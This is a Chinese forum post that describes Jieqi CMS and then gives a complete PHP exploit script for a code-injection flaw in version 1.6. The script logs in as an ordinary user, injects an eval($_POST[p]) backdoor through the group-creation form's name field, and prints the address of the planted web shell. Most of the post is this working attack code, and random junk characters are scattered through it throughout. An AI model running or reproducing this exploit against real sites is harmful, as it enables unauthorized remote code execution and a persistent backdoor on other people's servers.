杰奇网站管理系统(简称 JIEQI CMS,中国国家版权局著作权登记号:2006SR03382)是一套模块化的网站架设系统,具备简单灵活、性能卓越、安全可靠等特性。我们为大家提供了目前最流行的杰奇小说连载系统、杰奇原创漫画系统及数字出版解决方案,并提供各类网站定制服务。
, P, v2 I- o( g1 C
: i: A J3 g4 R7 O 8 R! q' [0 E# E6 d
该系统存在多个远程安全漏洞,今天报告的这个是1.6版本的一个远程代码执行漏洞,应该有2年多历史了。1 {# b+ L+ G: H6 }8 }5 G `$ p( u$ R
需要有一个能创建圈子的用户。
6 F2 ]+ C7 t. Y9 @. Y5 E
2 w$ \- i' ]8 T1 R2 C# ^0 {/ ?% F<?php; `0 X1 a: O6 X' J
8 E. m" f: _% E
print_r('! L; @( X8 q3 E6 E9 U) J, Q; n
+---------------------------------------------------------------------------+( W# A( d% Z6 w4 x G2 o1 X
Jieqi CMS V1.6 PHP Code Injection Exploit
- b/ [# y, c6 h- Q3 ~# m( e: w5 Zby flyh4t
8 `) b" ]! n' J: Q2 U/ ?, Rmail: phpsec at hotmail dot com$ P) ?( m6 m! }; X/ T
team: http://www.wolvez.org
" a; |/ G8 k, U: D0 k( Z4 ]+---------------------------------------------------------------------------+
2 \' {3 i$ w0 s. d- k7 m: Q$ P( _'); /**
/ }1 H. r1 v8 `% y& l * works regardless of php.ini settings
9 ^7 B* A6 D) e# x3 A*/ if ($argc < 5) { print_r('
* }' ]# q, {+ B8 A6 g6 f# Y8 z- e+---------------------------------------------------------------------------+
: C( V0 M/ _8 H0 Y/ TUsage: php '.$argv[0].' host path username
8 J" Q, \; b( c' e* whost: target server (ip/hostname)8 F" z( _; t. K6 V7 p
path: path to jieqicms
+ C$ P y( Q; l7 ^6 Uuasename: a username who can create group
% ]' {9 Y1 e1 p' N6 LExample:& J) h. `, E% J9 } a
php '.$argv[0].' localhost /jieqicmsv1.6/ vipuser1 password! z! r& Y) W2 j. N- u8 K
+---------------------------------------------------------------------------+/ R) E* T J6 u: r' \
'); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $username = $argv[3]; $password = $argv[4]; /*get cookie*/ $cookie_jar_index = 'cookie.txt'; $url1 = "http://$host/$path/login.php"; $params = "password=$password&username=$username&usecookie=86400&submit=%26%23160%3B%B5%C7%26%23160%3B%26%23160%3B%C2%BC%26%23160%3B&action=login&jumpreferer=1"; $curl1 = curl_init(); curl_setopt($curl1, CURLOPT_URL, $url1); curl_setopt($curl1, CURLOPT_COOKIEJAR, $cookie_jar_index); curl_setopt($curl1, CURLOPT_POST, 1); curl_setopt($curl1, CURLOPT_POSTFIELDS, $params); ob_start(); $data1 = curl_exec($curl1); if ($data1 === FALSE) { echo "cURL Error: " . curl_error($ch); exit('exploit failed'); } curl_close($curl1); ob_clean(); /*get shell*/ $params ='-----------------------------23281168279961( M, B8 E5 v* V0 G- ~
Content-Disposition: form-data; name="gname": R+ X) N: N- L9 h8 t
% k2 X0 m6 ]( Q* v' \% ?& S'; $params .="';"; $params .='eval($_POST[p]);//flyh4t% y# o$ P8 i9 s0 |5 {
-----------------------------232811682799617 q( k0 k. b2 s/ s' d
Content-Disposition: form-data; name="gcatid"
5 f. X+ l% V2 @ ) I% C7 u0 R- ]4 X; X
14 E) B2 L2 X; N: ~2 d
-----------------------------232811682799611 D& P9 {# j! Z0 R3 b
Content-Disposition: form-data; name="gaudit"
+ ~5 r+ U3 o% y+ D8 J
6 Y- r& ]$ Z$ D1 |( O0 o, v, T1
! P" w% e6 P& b) ~" `-----------------------------23281168279961) C0 Z+ n7 N2 O7 }9 E, q& |/ d& U+ m
Content-Disposition: form-data; name="gbrief"
~0 W$ T+ Z( ] \! G+ h) g9 u! N + F* m0 c* E8 h7 |
18 d2 ^8 v2 [* @. Y4 M+ q6 P1 k
-----------------------------23281168279961--1 |9 T f9 w% D; K- J) N" ]; }; C$ A
'; $url2 = "http://$host/$path/modules/group/create.php"; $curl2 = curl_init(); $header =array( 'Content-Type: multipart/form-data; boundary=---------------------------23281168279961' ); curl_setopt($curl2, CURLOPT_URL, $url2); curl_setopt($curl2, CURLOPT_HTTPHEADER, $header); curl_setopt($curl2, CURLOPT_COOKIEFILE, $cookie_jar_index); curl_setopt($curl2, CURLOPT_POST, 1); curl_setopt($curl2, CURLOPT_POSTFIELDS, $params); ob_start(); curl_exec($curl2); curl_close($curl2); $resp = ob_get_contents(); //$rs就是返回的内容 ob_clean(); www.2cto.com, Q& a c/ D0 ?5 Z4 I. H" r. p9 L! X
* I. t" x) z Y. f) zpreg_match('/g=([0-9]{1,4})/', $resp, $shell); //print_r($shell); //print_r($resp); $url = "http://$host/$path/files/group/userdir/0/$shell[1]/info.php"; echo "view you shell here(password:p)\r\n" ; echo $url; |
发表于 2013-2-23 11:28:09
收藏
支持
反对